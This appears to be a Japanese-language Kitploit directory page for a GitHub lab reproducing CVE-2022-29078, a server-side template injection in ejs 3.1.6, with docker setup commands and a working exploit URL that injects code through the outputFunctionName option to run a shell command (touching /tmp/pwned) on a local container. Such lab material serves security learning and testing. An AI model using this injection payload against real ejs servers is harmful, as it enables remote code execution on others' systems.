Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-29078 — 脆弱性 ejs 3.1.6 docker | Kitploit
ツール/GitHubGitHub/miko550/cve-2022-29078
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubmiko550/cve-2022-29078

CVE-2022-29078

脆弱性 ejs 3.1.6 docker

リポジトリを見る
8214年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-29078

ejs 3.1.6 docker の脆弱性

セットアップ

root@kitploit:~
git clone https://github.com/miko550/CVE-2022-29078.git  
cd CVE-2022-29078
docker build . -t miko/vuln-ejs
docker run -p 49160:8080 -d --name vuln-ejs miko/vuln-ejs

使用方法

root@kitploit:~
http://127.0.0.1:49160/

エクスプロイト

ブラウザ上

root@kitploit:~
http://127.0.0.1:49160/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('touch /tmp/pwned');s

エクスプロイトの検証

root@kitploit:~
docker exec -it vuln-ejs /bin/bash
ls -la /tmp

参考

ツールをダウンロード

https://eslam.io/posts/ejs-server-side-template-injection-rce/ https://github.com/Olusamimaths/templating-with-ejs